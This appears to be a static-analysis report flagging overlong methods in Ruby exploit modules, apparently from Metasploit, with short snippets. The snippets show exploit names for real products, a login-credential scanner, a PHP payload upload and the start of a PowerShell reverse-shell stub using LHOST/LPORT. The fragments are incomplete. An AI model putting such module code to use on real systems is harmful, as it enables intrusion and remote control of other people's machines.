Showing 7,361 of 22,177 total issues
Method run_host
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def run_host(ip)
#
# Using the InterBase Services Manager
# http://dn.codegear.com/article/27002
Method run_host
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def run_host(ip)
@org_rport = datastore['RPORT']
datastore['RPORT'] = datastore['SNMPPORT']
index_page = "index_ad.htm"
Method run_host
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def run_host(ip)
@ip = ip
print_status("Attempting login to #{ip}:#{rport}...")
cred_collection = build_credential_collection(
Method process_phase
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def process_phase(phase_num, phase_name, prepend = '', initial_cmds = [])
print_status("[Phase #{phase_num}] #{phase_name} - #{Time.now.localtime}")
ecount = 1
@evilchars.each do |evilstr|
Method command_string
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def command_string
lhost = datastore['LHOST']
lport = datastore['LPORT']
powershell = %Q^
$a='#{lhost}';
Method run
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def run
case target.arch.first
when ARCH_X64
arch_suffix = 'x64'
when ARCH_X86
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Polycom Command Shell Authorization Bypass',
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Mail.app Image Attachment Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability in the
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
'Description' => %q{
DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE',
Method exploit
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
init = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/')
})
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GitLab File Read Remote Code Execution',
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Rudder Server SQLI Remote Code Execution',
Method create_zip_and_upload
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def create_zip_and_upload(exploit)
@pl_file = Rex::Text.rand_text_alpha_lower(6..10)
@pl_file << '.php'
register_file_for_cleanup(@pl_file)
@header = Rex::Text.rand_text_alpha_upper(4)
Method check
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def check
res = send_request_cgi({'uri' => target_uri.path })
unless res
vprint_error("Connection timed out")
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WebNMS Framework Server Arbitrary File Upload',
Method check
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def check
if (target.name =~ /Unix/)
connect
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet JMX Remote Code Execution',
'Description' => %q{
Method initialize
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'freeFTPd 1.0 Username Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the freeFTPd
Method exploit
has 56 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
if !datastore['ExitOnSession'] && !job_id
fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
end